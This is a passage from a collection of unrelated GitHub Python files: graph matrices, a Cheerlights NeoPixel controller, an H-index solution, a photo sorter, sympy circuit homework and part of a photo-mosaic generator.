print(\"Incidence matrix\")\r\n    incidence_matrix_list = [0] * LenghtList\r\n    for i in range(LenghtList):\r\n        incidence_matrix_list[i] = [0] * ribs\r\n\r\n    if flag == 1:\r\n        coefficient = -1\r\n    else:\r\n        coefficient = 1\r\n\r\n    for i in range(ribs): # column\r\n        a = RibsList[i][0] # 1\r\n        b = RibsList[i][1] # 4\r\n        incidence_matrix_list[a-1][i] = 1 # row\r\n        incidence_matrix_list[b-1][i] = 1 * coefficient\r\n    print(np.matrix(incidence_matrix_list))\r\n\r\n\r\n#adjacency_matrix_list = [] # adjacency matrix\r\nprint(\"Which graph?\\n 1 - Directed\\n 2 - Undirected\")\r\nflag = int(input())\r\n\r\nprint(\"Enter the number of edges\")\r\nribs = int(input()) # edges\r\n# fill the array\r\nRibsList = filling_list(ribs)\r\n\r\n# number of vertices\r\nLenghtList = len(set(sum(RibsList, [])))\r\nprint(\"Number of vertices \",LenghtList)\r\n\r\n# adjacency matrix\r\nadjacency_matrix_list = adjacency_matrix(LenghtList, ribs, RibsList)\r\n\r\n# adjacency list\r\nadjacency_list(adjacency_matrix_list, LenghtList, ribs)\r\n\r\n# incidence matrix\r\nincidence_matrix(LenghtList, ribs, RibsList)","repo_name":"Girmoonzdtax/Graf","sub_path":"python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"19125304865","text":"\"\"\"\nThis micropython script will make regular requests to the cheerlights api\nand parse out the latest 'color' information using the\n'ujson' method. 
\nA counter is reset with each new color and incremented with each\nsubsequent same color cycle.\n\n@authors George Kaimakis and Russ Winch\n@version December 2017\n\"\"\"\n\nimport gc\nimport sys\nimport time\nimport urequests\nimport urandom\nimport neopixel\nfrom machine import Pin, ADC\n\ntry:\n import wifi\nexcept ImportError:\n print()\n print(\"'wifi' module not found.\")\n print()\n\ndef api_request(url):\n feed = urequests.get(url)\n return feed.json()['field1']\n\ndef new_neopixel_color(color, colors):\n \"\"\"check the color is valid and return RGB values\"\"\"\n if color in colors:\n return colors[color]\n print(\"not a valid Cheerlights colour\")\n return colors['red'] # default to red\n\ndef neopixel_write(neo, color, *args):\n if len(args) == 1:\n i = args[0]\n neo[i].fill(color)\n neo[i].write()\n # ignore none or too many arguments\n else:\n for i in range(len(neo)):\n neo[i].fill(color)\n neo[i].write()\n\ndef neopixel_blank(neo):\n neopixel_write(neo, (0,0,0))\n\ndef neopixel_confirm(neo, value, colors):\n \"\"\"This function determines the return value from the wifi() call and\n flashes the neopixels accordingly, green for wifi success, and red for wifi failure\n or for an invalid bool return.\n \"\"\"\n if value == True:\n color = colors['green']\n np_flash(neo, color) # uses default kwargs\n return True\n elif value == False:\n color = colors['red']\n np_flash(neo, color) # uses default kwargs\n return False\n else:\n print(\"Not a boolean value!\")\n color = colors['purple']\n np_flash(neo, color, num_of_flashes=6, duration=150)\n return False\n\ndef np_flash(neo, color, *, num_of_flashes=3, duration=300):\n \"\"\"This function flashes the neopixel(s) in terms of number of flashes and\n duration value in milliseconds.\n Note: function accepts keyword-only arguments.\n \"\"\"\n for i in range(num_of_flashes):\n neopixel_write(neo, color)\n time.sleep_ms(duration)\n neopixel_blank(neo)\n time.sleep_ms(duration)\n\ndef color_transition(neo, previous, target):\n \"\"\"compares previous and target rgb values & calculates the transition.\n writes to the neopixel & returns the new color value to the caller to be\n asigned as the next previous_rgb value.\n \"\"\"\n speed = 25 # ms delay after each transition\n new = list(previous)\n if target != previous:\n for i, _ in enumerate(previous):\n if previous[i] < target[i]:\n new[i] += 1\n elif previous[i] > target[i]:\n new[i] -= 1\n neopixel_write(neo, new)\n time.sleep_ms(speed) # smooth the transition\n return tuple(new)\n\n\ndef main():\n # look-up color dict - api 'field1' is used as the key:\n colors = {\n 'red': (255,0,0),\n 'orange': (211,84,0),\n 'yellow': (254,183,12),\n 'green': (0,128,0),\n 'cyan': (0,255,255),\n 'blue': (0,0,255),\n 'purple': (128,0,128),\n 'magenta': (255,0,255),\n 'pink': (254,52,62),\n 'white': (255,255,230),\n 'oldlace': (255,200,130),\n 'warmwhite': (255,200,130),\n # 'red': (255, 0, 0),\n # 'orange': (255, 30, 0),\n # 'yellow': (255, 110, 1),\n # 'green': (0, 255, 0),\n # 'cyan': (0, 255, 255),\n # 'blue': (0, 0, 255),\n # 'purple': (128, 0, 128),\n # 'magenta': (255, 0, 50),\n # 'pink': (255, 40, 50),\n # 'white': (255, 255, 170),\n # 'oldlace': (255, 150, 50),\n # 'warmwhite': (255, 150, 50)\n }\n\n\n host = 'https://thingspeak.com/'\n topic = 'channels/1417/feeds/last.json'\n api = host + topic\n\n\n neopixels = [] # holder for the neo pixels\n pixel_pins = [0] # D3\n num_pixels = 1 # leds per strip\n\n\n # define pins, create neopixel objects, and populate neopixels list:\n for i in 
range(len(pixel_pins)):\n        pin = Pin(pixel_pins[i], Pin.OUT)\n        neopixels.append(neopixel.NeoPixel(pin, num_pixels))\n\n\n    # turn off any lit neopixels:\n    neopixel_blank(neopixels)\n\n\n    # seed the random generator\n    adc = ADC(0)\n    seed = adc.read()\n    print(\"random seed: \", seed)\n    urandom.seed(seed)\n\n\n    # attempt to connect to wifi,\n    # if connected, break from while loop:\n    while True:\n        # keep trying to connect to the internet:\n        try:\n            wifi.connect_wifi()\n            break\n        except Exception:\n            print(\"Can not connect to wifi\")\n            time.sleep(5)\n\n\n    prev_color = ''\n    previous_rgb = (0, 0, 0)\n    recvd_color = ''\n    target_rgb = (0, 0, 0)\n\n\n    count = 0\n    interval = 20 # seconds delay between updates\n    last_update = time.time() - interval\n    # last_update = -100 # time.time() + interval\n\n\n    # main loop:\n    while True:\n        if time.time() > last_update + interval:\n            recvd_color = api_request(api)\n            last_update = time.time()\n\n            # If cheerlights color feed has not changed, increment counter:\n            if recvd_color == prev_color:\n                count += 1\n\n            # if color has changed, reset counter, re-assign prev_color,\n            # extract rgb color from color lookup dict:\n            else:\n                count = 1\n                prev_color = recvd_color\n                target_rgb = new_neopixel_color(recvd_color, colors)\n\n            print(str(count) + ': ' + recvd_color)\n\n        previous_rgb = color_transition(neopixels, previous_rgb, target_rgb)\n\n\n# run the main function\nif __name__ == \"__main__\":\n    main()\n","repo_name":"geokai/cheerlights_upython_NON-UPSTREAM","sub_path":"api_cheerlights.py","file_name":"api_cheerlights.py","file_ext":"py","file_size_in_byte":5905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"3096261986","text":"def solution(citations):\n    \n    n = len(citations)\n    b = sorted(citations,reverse=True)\n    count = 0\n    for i in range(n):\n        tmp = b[i]\n        count += 1\n        if tmp < count:\n            count = count - 1\n            break\n    return count","repo_name":"cksdud7007/CodingTest","sub_path":"프로그래머스/lv2/42747. H-Index/H-Index.py","file_name":"H-Index.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"7174799700","text":"from tkinter import *\r\nfrom tkinter import filedialog\r\nfrom tkinter import ttk\r\nfrom tkinter import messagebox\r\nimport os\r\nfrom datetime import datetime\r\n\r\nroot = Tk()\r\n\r\nroot.title('PhotoSort')\r\nroot.geometry('500x150+500+300')\r\n\r\ns = ttk.Style()\r\ns.configure('my.TButton', font=(\"Helvetica\", 15))\r\n\r\n\r\ndef start():\r\n    cur_path = entry_path.get() # ask the entry widget for the chosen path\r\n    if cur_path:\r\n        for folder , subfolders , files in os.walk(cur_path): # walk every file under the chosen folder\r\n            for file in files:\r\n                path = os.path.join(folder,file) # build the full path to each photo\r\n                mtime = os.path.getmtime(path) # modification time in seconds since the epoch\r\n                date = datetime.fromtimestamp(mtime) # convert it to a datetime\r\n                date = date.strftime('%Y-%m') # format the date as year-month\r\n                date_folder = os.path.join(cur_path , date) # destination folder: chosen path plus creation date\r\n\r\n                if not os.path.exists(date_folder): # if there is no folder for this photo's date yet, create it\r\n                    os.mkdir(date_folder)# create it\r\n                os.rename(path , os.path.join(date_folder,file)) # move the file into the created folder by renaming its path\r\n        messagebox.showinfo('Success' , 'Sorting finished ')\r\n        entry_path.delete(0,END)\r\n    else:\r\n        messagebox.showwarning('Error','Choose a folder with photos')\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef choose_dir():\r\n    path = filedialog.askdirectory()\r\n    entry_path.delete(0, END)\r\n    entry_path.insert(0, path)\r\n\r\n\r\nm_frame = Frame(root, bg='#56ADFF', bd=5)\r\nm_frame.pack(pady=10, padx=10, fill=X)\r\nentry_path = ttk.Entry(m_frame)\r\nentry_path.pack(side=LEFT, expand=1, fill=X)\r\nBtn_choose = ttk.Button(m_frame, text='Choose folder', command=choose_dir).pack(fill=X, side=LEFT, padx=8)\r\n\r\nstart = ttk.Button(root, text=' Start', style=\"my.TButton\", command=start).pack(fill=X, padx=10)\r\n\r\nroot.mainloop()\r\n","repo_name":"DevSpaciX/PhotoSort-by-any-date-","sub_path":"PhotoSort.py","file_name":"PhotoSort.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"8020828909","text":"import sympy\nfrom math import degrees\n\nfrom sympy.physics.control.lti import TransferFunction\nfrom sympy.physics.control import control_plots as cplot\nimport matplotlib.pyplot as plt\n\n\ndef problem_1a():\n    \"\"\"\n    Problem 1 part a\n    Prints the two solutions to the terminal\n    \"\"\"\n    t1, t2 = sympy.symbols(\"t1, t2\")\n    fx = 4 * sympy.cos(t1) + 3 * sympy.cos(t2) - 6\n    fy = 4 * sympy.sin(t1) + 3 * sympy.sin(t2) - 2\n    # [{t1: ,t2: },{t1: , t2: }]\n    answers = sympy.solve([fx, fy], (t1, t2), dict=True)\n    print(\"raw:\")\n    sympy.pprint(answers)\n    print(\"Degrees:\\n(theta1, theta2)\")\n    # loop through the answers list, convert to degrees, and account for t2 = theta1 + theta2\n    for a in answers:\n        print(\n            (degrees(a[t1].evalf()), degrees(a[t2].evalf()) - degrees(a[t1].evalf()))\n        )\n\n\ndef problem_1b():\n    \"\"\"\n    Create the plot for Problem 1 part b\n    \"\"\"\n    y, t1, t2 = sympy.symbols(\"y, t1, t2\", real=True)\n    # given functions\n    fx = 4 * sympy.cos(t1) + 3 * sympy.cos(t2) - 6\n    fy = 4 * sympy.sin(t1) + 3 * sympy.sin(t2) - y\n\n    # solve function x for t1 and t2\n    ft1 = sympy.solve(fx, t1, dict=True)\n    ft2 = sympy.solve(fx, t2, dict=True)\n\n    # substitute functions for t1 and t2 into function y\n    # so we can have t1 and t2 purely in terms of y\n    f1 = fy.subs(ft1[0])\n    a1 = sympy.solve(f1, t2)\n    f2 = fy.subs(ft2[0])\n    a2 = sympy.solve(f2, t1)\n\n    # account for t2 = theta1 + theta2\n    a2 = a2[0] - a1[0]\n\n    # rad -> deg\n    a1 = (a1[0] * 180) / sympy.pi\n    a2 = (a2 * 180) / sympy.pi\n\n    # plot\n    plt_theta1 = sympy.plot(a1, (y, 0.1, 3.6), show=False)\n    plt_theta1.ylabel = r\"$\\theta_1$ (degrees)\"\n    plt_theta1.xlabel = r\"$\\it{y}$ (feet)\"\n    plt_theta2 = sympy.plot(a2, (y, 0.1, 3.6), show=False)\n    plt_theta2.ylabel = r\"$\\theta_2$ (degrees)\"\n    plt_theta2.xlabel = r\"$\\it{y}$ (feet)\"\n    sympy.plotting.PlotGrid(2, 1, plt_theta1, plt_theta2)\n\n\ndef problem_2b():\n    \"\"\"\n    Create the plot for Problem 2 part b\n    \"\"\"\n    r, s, c, l, w = sympy.symbols(\"r, s, c, l, w\", real=True)\n    numer = (r * w) / l\n    denom = sympy.sqrt((1 / (l * c) - w ** 2) ** 2 + (r * w / l) ** 2)\n    h = numer / denom\n    values = {\n        c: 10e-6,\n        l: 5e-3,\n    }\n    w_range = (w, 
100, 100000) # 100 to 100k rad/s\n h = h.subs(values) # sub given C and L\n h_r10 = h.subs({r: 10})\n h_r100 = h.subs({r: 100})\n h_r1k = h.subs({r: 1000})\n\n # plot\n plt_r = sympy.plot(h_r10, w_range, show=False, legend=True, label=\"R=10\")\n plt_r100 = sympy.plot(h_r100, w_range, show=False, label=\"R=100\")\n plt_r1k = sympy.plot(h_r1k, w_range, show=False, label=\"R=1k\")\n plt_r.extend(plt_r100)\n plt_r.extend(plt_r1k)\n plt_r.title = r\"Transfer Function $\\it{H}$\"\n plt_r.xlabel = r\"$\\it{\\omega}$ (rad/s)\"\n plt_r.ylabel = r\"$\\it{H}(\\omega)$\"\n plt_r.show()\n\n\ndef problem_2cd():\n \"\"\"\n Create plots for Problem 2 parts c and d\n \"\"\"\n s = sympy.symbols(\"s\")\n r, c, l = sympy.symbols(\"r, c, l\", real=True)\n numer = r\n denom = r + (s * l) + (1 / (s * c))\n h = TransferFunction(numer, denom, s)\n values = {\n c: 10e-6,\n l: 5e-3,\n }\n h = h.subs(values)\n r_values = [10, 100, 1000]\n\n impulse_data = {}\n step_data = {}\n for i in r_values:\n f = h.subs({r: i})\n # part c\n cplot.bode_magnitude_plot(f, freq_unit=\"rad/sec\")\n\n # part d\n # use numerical_data functions to make plotting them together easier\n impulse_data[i] = cplot.impulse_response_numerical_data(f, upper_limit=0.005)\n step_data[i] = cplot.step_response_numerical_data(f, upper_limit=0.05)\n\n def plot_from_data(data: dict, plot_title: str):\n \"\"\"\n Plot data from dict of numerical_data (x, y) tuples\n :param data: dict of (x, y) tuples\n :param plot_title: title for the plot\n \"\"\"\n colors = {\n 10: 'b',\n 100: 'g',\n 1000: 'r'\n }\n for k, v in data.items():\n x, y = v\n plt.plot(x, y, color=colors[k], label=f\"R={k}\")\n plt.legend()\n plt.xlabel(\"Time (s)\")\n plt.ylabel(\"Amplitude\")\n plt.title(plot_title)\n plt.show()\n\n plot_from_data(impulse_data, \"Impulse Response\")\n plot_from_data(step_data, \"Step Response\")\n\n\ndef problem_2e():\n \"\"\"\n Print the natural response function for v_r\n \"\"\"\n t, r, l, c = sympy.symbols(\"t, r, l, c\", real=True)\n v_r, v_i = sympy.symbols(\"v_r, v_i\", cls=sympy.Function)\n deriv2_v_r = sympy.Derivative(v_r(t), t, 2)\n deriv_v_r = sympy.Derivative(v_r(t), t)\n f = deriv2_v_r + (r / l) * deriv_v_r + (v_r(t) / (l * c))\n ans = sympy.dsolve(f)\n sympy.pprint(ans)\n\n\nif __name__ == \"__main__\":\n sympy.init_printing(use_unicode=True)\n # change this function call to run a specific problem. 
We're not fancy here today.\n problem_2e()\n","repo_name":"sneakyaardvark/l6-sympy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32088073170","text":"import colorsys\nimport enum\nimport glob\nimport logging\nimport math\nimport multiprocessing\nimport os\nimport pickle\nimport queue\nimport random\nimport sys\nfrom multiprocessing import Process, Queue, Array, Lock\nfrom operator import itemgetter\nfrom time import time\n\nimport PIL.Image\nimport cv2\nimport numpy as np\nimport pygame\nimport tensorflow as tf\nimport tensorflow_hub as hub\nfrom PIL import ImageStat, ImageColor\nfrom pygame.locals import *\n\nimport label_map_util\n\nlogging.basicConfig(level=logging.DEBUG, format='%(process)d :: %(asctime)s :: %(levelname)s :: %(message)s')\na_logger = logging.getLogger()\noutput_file_handler = logging.FileHandler(\"output.log\")\nstdout_handler = logging.StreamHandler(sys.stdout)\na_logger.addHandler(output_file_handler)\na_logger.addHandler(stdout_handler)\n\n# define some parameter depending on whether we want to display it on 4k or 1800 display\nFOUR_K_MODE = False\n\nif FOUR_K_MODE:\n TILE_SIZE = 24 # or 30\n SCREEN_SIZE = (3840, 2160)\n LINE_WIDTH = 12\n FONT_SIZE = 40\n NUM_SAMPLES = 14400 # 32036 # total number of \"palette\" images from which we will choose from\n INPUT_TILES_DIR = \"./tiles/4k/\"\nelse:\n TILE_SIZE = 15\n SCREEN_SIZE = (1920, 1080)\n LINE_WIDTH = 6\n FONT_SIZE = 20\n NUM_SAMPLES = 9216 # total number of \"palette\" images from which we will choose from\n INPUT_TILES_DIR = \"./tiles/1800/\"\n\n# ENLARGEMENT = 8 # the mosaic image will be this many times wider and taller than the original TODO del\nTILE_MATCH_RES = 5 # tile matching resolution (higher values give better fit but require more processing)\nIMAGE_SIZE = (800, 450)\nTILE_BLOCK_SIZE = TILE_SIZE / max(min(TILE_MATCH_RES, TILE_SIZE), 1)\nWORKER_COUNT = max(multiprocessing.cpu_count() - 4, 1)\nEOQ_VALUE = None\nMAX_REUSE = 1 # max number of times a single image should be used in the mosaic\n\n# used for threshold condition in the swapping algorithm\nUNIT_TIME_SWAP_THRESHOLD = 10.0\n\nINPUT_IMAGES_DIR = \"./images/\"\nINPUT_INIT_IMAGES_DIR = \"./init_images/\"\nOUTPUT_DIR = \"./output/\"\n\nOUTPUT_FRAME_IMAGE_FILE_NAME = OUTPUT_DIR + \"mosaic_output\" + str(int(time() * 1000)) + \".jpg\"\nOUTPUT_SCREEN_IMAGE_FILE_NAME = OUTPUT_DIR + \"mosaic_screen_output\" + str(int(time() * 1000)) + \".jpg\"\nOUTPUT_VIDEO_FILE_NAME = OUTPUT_DIR + \"mosaic_output\" + str(int(time() * 1000)) + \".avi\"\n\n# frames per second rate for video\nFPS = 15\n# Save / record every nth frame (1 meaning every frame)\nFTS = 1\n\nPIL.Image.MAX_IMAGE_PIXELS = 933120000\n\n# support either downloading the models from the web, or from a local folder \"tfhub\"\n#MODEL_DIR_OPENIMAGES = \"tfhub/faster_rcnn_openimages_v4_inception_resnet_v2_1/\"\nMODEL_DIR_OPENIMAGES = \"https://tfhub.dev/google/faster_rcnn/openimages_v4/inception_resnet_v2/1\"\n#MODEL_DIR_COCO2017 = \"tfhub/efficientdet_d7_1/\"\nMODEL_DIR_COCO2017 = \"https://tfhub.dev/tensorflow/efficientdet/d7/1\"\n# required for mapping coco label ids to class names\nCOCO2017_LABELS = \"tfhub/mscoco_label_map.pbtxt\"\n\n# max detection boxes to display (model returns 100)\nMAX_BOXES = 25\n\n# permutation encoding\nACB = 1\nBAC = 2\nBCA = 3\nCAB = 4\nCBA = 5\n\n\n# calculate the perceived brightness of a given image\ndef get_brightness(im):\n 
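# perceived luminance per the classic HSP colour model: sqrt(0.241*R^2 + 0.691*G^2 + 0.068*B^2)\r\n    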
stat = ImageStat.Stat(im)\n r, g, b = stat.mean\n return math.sqrt(0.241 * (r ** 2) + 0.691 * (g ** 2) + 0.068 * (b ** 2))\n\n\n# calculate the hue value of an image\ndef get_hue(im):\n img2 = im.resize((1, 1), PIL.Image.ANTIALIAS)\n color = img2.getpixel((0, 0))\n\n try:\n hls = colorsys.rgb_to_hls(color[0], color[1], color[2])\n except ZeroDivisionError as e:\n a_logger.warning(e)\n pass\n hls = colorsys.rgb_to_hls(color[0] + 1, color[1] + 2, color[2] + 3)\n return hls[0]\n\n\n# 3 ways to init the mosaic:\n# Random - random spread of all the tile images\n# Hue - organize the tiles by hue\n# Image - organize the tiles according to some image (has to be prepared beforehand -\n# export the image as a mosaic, to figure out tiles placement\nclass InitMode(enum.Enum):\n Random = 1\n Image = 2\n Hue = 3\n\n\n# 4 algorithms for switching tiles in runtime:\n# Random - iterate over all tiles at random order, replace tile with best fitting tile for that spot\n# Brightness - iterate over all tiles according to brightness (starting with least brightest),\n# replace tile with best fitting tile for that spot.\n# BrightnessReverse - iterate over all tiles according to brightness (starting with brightest),\n# replace tile with best fitting tile for that spot\n# Switch - choose two tiles in random, switch between them if improves (using dynamic improvement function)\nclass BuildMode(enum.Enum):\n Random = 1\n Brightness = 2\n BrightnessReverse = 3\n Switch = 4\n Ordered = 5\n\n\nclass Config:\n def __init__(self, create_video, save_images, init_order, building_order, image_file, init_image, tiles_file,\n wait_for_keypress, use_coco):\n self.create_video = create_video\n self.save_images = save_images\n self.init_order = init_order\n self.building_order = building_order\n self.init_image = init_image\n self.wait_for_keypress = wait_for_keypress\n self.image_file = image_file\n self.tiles_file = tiles_file\n self.use_coco = use_coco\n\n\nclass ProgressCounter:\n def __init__(self, total, text):\n self.total = total\n self.counter = 0\n self.text = text\n\n def update(self):\n self.counter += 1\n print(\"\\r{} Progress for {}: {:04.1f}%\".format(os.getpid(), self.text,\n 100 * self.counter / self.total), end=\"\")\n\n\n# input: x, y coordinates\n# output: returns a large bounding box (for actual tile placement) and a small bounding box (used for diff comparison)\ndef get_boxes(x, y):\n large_box = (x * TILE_SIZE, y * TILE_SIZE, (x + 1) * TILE_SIZE, (y + 1) * TILE_SIZE)\n small_box = (\n x * TILE_SIZE / TILE_BLOCK_SIZE, y * TILE_SIZE / TILE_BLOCK_SIZE,\n (x + 1) * TILE_SIZE / TILE_BLOCK_SIZE,\n (y + 1) * TILE_SIZE / TILE_BLOCK_SIZE)\n return large_box, small_box\n\n\n# input: a list of tile images output: a sorted list of these image tiles, sorted bu brightness values (with\n# parameter to define ascending / descending) brightness is defined as perceived brightness distance from grey\ndef get_brightness_data(original_img_small, x_tile_count, y_tile_count):\n by_brightness = []\n size = int(TILE_SIZE / TILE_BLOCK_SIZE)\n\n progress = ProgressCounter(x_tile_count * y_tile_count, \"Sorting image tiles by brightness\")\n for x in range(x_tile_count):\n for y in range(y_tile_count):\n large_box, small_box = get_boxes(x, y)\n\n img = PIL.Image.new('RGB', (size, size))\n img.putdata(original_img_small.crop(small_box).getdata())\n b = get_brightness(img)\n by_brightness.append((b, x * y_tile_count + y))\n progress.update()\n\n return by_brightness\n\n\nclass TileProcessor:\n def __init__(self, tiles_path):\n 
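# tiles_path is either a directory of source images, or a pickle file holding (large, small) tile lists cached by an earlier run (see get_tiles below)\r\n        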
self.tiles_path = tiles_path\n\n @staticmethod\n def __process_tile(tile_path):\n try:\n img = PIL.Image.open(tile_path)\n # tiles must be square, so get the largest square that fits inside the image\n w = img.size[0]\n h = img.size[1]\n min_dimension = min(w, h)\n w_crop = (w - min_dimension) / 2\n h_crop = (h - min_dimension) / 2\n img = img.crop((w_crop, h_crop, w - w_crop, h - h_crop))\n\n large_tile_img = img.resize((TILE_SIZE, TILE_SIZE), PIL.Image.ANTIALIAS)\n small_tile_img = img.resize((int(TILE_SIZE / TILE_BLOCK_SIZE), int(TILE_SIZE / TILE_BLOCK_SIZE)),\n PIL.Image.ANTIALIAS)\n\n return large_tile_img.convert('RGB'), small_tile_img.convert('RGB')\n except Exception as e:\n a_logger.exception(e)\n return None, None\n\n def get_tiles(self):\n if os.path.isfile(self.tiles_path):\n tiles_file = open(self.tiles_path, 'rb')\n tiles_data = pickle.load(tiles_file)\n tiles_file.close()\n return tiles_data\n\n large_tiles = []\n small_tiles = []\n\n files = []\n ext = ('*.jpg', '*.jpeg')\n for e in ext:\n files.extend(glob.glob(os.path.join(self.tiles_path, e)))\n\n # Choose a random subset of the overall images\n # this helps to ensure we have a representative sample also\n # when we init by hue or brightness\n if len(files) > NUM_SAMPLES:\n files = random.sample(files, NUM_SAMPLES)\n\n progress = ProgressCounter(len(files), \"Reading tiles\")\n\n for tile_path in files:\n large_tile, small_tile = self.__process_tile(tile_path)\n\n if large_tile:\n large_tiles.append(large_tile)\n small_tiles.append(small_tile)\n progress.update()\n\n a_logger.debug('Processed {} tiles.'.format(len(large_tiles)))\n\n return large_tiles, small_tiles\n\n\nclass TargetImage:\n def __init__(self, image_path):\n self.image_path = image_path\n\n def get_data(self):\n a_logger.debug('Processing main image...')\n img = PIL.Image.open(self.image_path)\n img = img.resize(SCREEN_SIZE, PIL.Image.ANTIALIAS)\n\n # use SCREEN_SIZE as the target size for the mosaic\n w = SCREEN_SIZE[0] # img.size[0] * ENLARGEMENT\n h = SCREEN_SIZE[1] # img.size[1] * ENLARGEMENT\n large_img = img.resize((w, h), PIL.Image.ANTIALIAS)\n w_diff = (w % TILE_SIZE) / 2\n h_diff = (h % TILE_SIZE) / 2\n\n # if necessary, crop the image slightly so we use a whole number of tiles horizontally and vertically\n if w_diff or h_diff:\n large_img = large_img.crop((w_diff, h_diff, w - w_diff, h - h_diff))\n\n small_img = large_img.resize((int(w / TILE_BLOCK_SIZE), int(h / TILE_BLOCK_SIZE)), PIL.Image.ANTIALIAS)\n\n image_data = (large_img.convert('RGB'), small_img.convert('RGB'))\n\n a_logger.debug('Main image processed.')\n\n return image_data\n\n\nclass TileFitter:\n def __init__(self, tiles_data, diff_cache):\n self.tiles_data = tiles_data\n self.last_change = -1\n self.alpha = 0.3\n self.total_positive = 0\n self.total_negatives = 0\n self.start_time = time()\n self.local_diff_cache = diff_cache\n\n @staticmethod\n def __get_tile_diff(t1, t2, bail_out_value):\n\n diff = 0\n for i in range(len(t1)):\n diff += ((t1[i][0] - t2[i][0]) ** 2 + (t1[i][1] - t2[i][1]) ** 2 + (t1[i][2] - t2[i][2]) ** 2)\n if diff > bail_out_value:\n # we know already that this isn't going to be the best fit, so no point continuing with this tile\n return diff\n return diff\n\n def is_switch_good(self, img_data, coords, coords2id, lock):\n\n img1 = img_data[0]\n img2 = img_data[1]\n img3 = img_data[2]\n\n id1 = coords2id[coords[0]]\n id2 = coords2id[coords[1]]\n id3 = coords2id[coords[2]]\n\n tile_data1 = self.tiles_data[id1]\n tile_data2 = self.tiles_data[id2]\n tile_data3 = 
self.tiles_data[id3]\n\n # get the diff between the images and the tiles in the current state\n # use the cached value if possible\n\n # will be used to define the switch permutation between 3 tiles\n abc = -1\n\n # Switch condition: if at least 1 side improves by more than 1-alpha %, and the other one does\n # not get worse\n # we also keep track of how many successful swaps we did since last time reset\n # we use that as a proxy to headroom (we stop the program, when we go below a minimal threshold\n\n # BAC\n if img1 is None:\n new_diffB2A = sys.maxsize - 1\n new_diffC2A = sys.maxsize - 1\n curr_diff1 = sys.maxsize\n else:\n curr_diff1 = self.__get_tile_diff(img1, tile_data1,\n sys.maxsize) # self.get_current_diff( id1, img1, lock, tile_data1)\n new_diffB2A = self.__get_tile_diff(img1, tile_data2, curr_diff1)\n\n curr_diff2 = self.__get_tile_diff(img2, tile_data2, sys.maxsize)\n curr_diff3 = self.__get_tile_diff(img3, tile_data3, sys.maxsize)\n\n new_diffA2B = self.__get_tile_diff(img2, tile_data1, curr_diff2)\n\n if (new_diffB2A < self.alpha * curr_diff1 and new_diffA2B < curr_diff2) or (\n new_diffB2A < curr_diff1 and new_diffA2B < self.alpha * curr_diff2):\n self.last_change = time()\n self.total_positive += 1\n return True, new_diffB2A, new_diffA2B, curr_diff3, BAC\n\n # CBA\n if img1 is not None:\n new_diffC2A = self.__get_tile_diff(img1, tile_data3, curr_diff1)\n\n new_diffA2C = self.__get_tile_diff(img3, tile_data1, curr_diff3)\n\n if (new_diffC2A < self.alpha * curr_diff1 and new_diffA2C < curr_diff3) or (\n new_diffC2A < curr_diff1 and new_diffA2C < self.alpha * curr_diff3):\n self.last_change = time()\n self.total_positive += 1\n return True, new_diffB2A, new_diffA2B, curr_diff3, CBA\n\n # ACB\n new_diffC2B = self.__get_tile_diff(img2, tile_data3, curr_diff2)\n new_diffB2C = self.__get_tile_diff(img3, tile_data2, curr_diff3)\n\n if (new_diffB2C < self.alpha * curr_diff3 and new_diffC2B < curr_diff2) or (\n new_diffB2C < curr_diff3 and new_diffC2B < self.alpha * curr_diff2):\n self.last_change = time()\n self.total_positive += 1\n return True, new_diffB2A, new_diffA2B, curr_diff3, ACB\n\n # CAB\n\n if new_diffC2A < self.alpha * curr_diff1 and new_diffA2B < curr_diff2 and new_diffB2C < curr_diff3 or \\\n new_diffC2A < curr_diff1 and new_diffA2B < self.alpha * curr_diff2 and new_diffB2C < curr_diff3 or \\\n new_diffC2A < curr_diff1 and new_diffA2B < curr_diff2 and new_diffB2C < self.alpha * curr_diff3:\n self.last_change = time()\n self.total_positive += 1\n abc = CAB\n\n return True, new_diffC2A, new_diffA2B, new_diffB2C, abc\n\n # BCA\n if new_diffB2A < self.alpha * curr_diff1 and new_diffC2B < curr_diff2 and new_diffA2C < curr_diff3 or \\\n new_diffB2A < curr_diff1 and new_diffC2B < self.alpha * curr_diff2 and new_diffA2C < curr_diff3 or \\\n new_diffB2A < curr_diff1 and new_diffC2B < curr_diff2 and new_diffA2C < self.alpha * curr_diff3:\n self.last_change = time()\n self.total_positive += 1\n abc = BCA\n\n return True, new_diffB2A, new_diffC2B, new_diffA2C, abc\n\n if time() - self.start_time >= UNIT_TIME_SWAP_THRESHOLD:\n a_logger.debug(\n \"Positives: {} Negatives: {} Time lapse: {}\".format(self.total_positive, self.total_negatives,\n time() - self.start_time))\n\n # heuristic for swapping threshold:\n if self.total_positive == 0 or (\n self.total_positive > 0 and self.total_negatives / self.total_positive > 1000): # todo\n self.alpha += 0.1\n a_logger.debug(\"updating alpha to {}\".format(self.alpha))\n if self.alpha >= 1.0:\n a_logger.debug(\"No more improvements!\")\n 
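# alpha has been annealed all the way to 1.0, so the acceptance test no longer demands any real improvement margin; treat the search as converged and signal the workers to shut down\r\n                    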
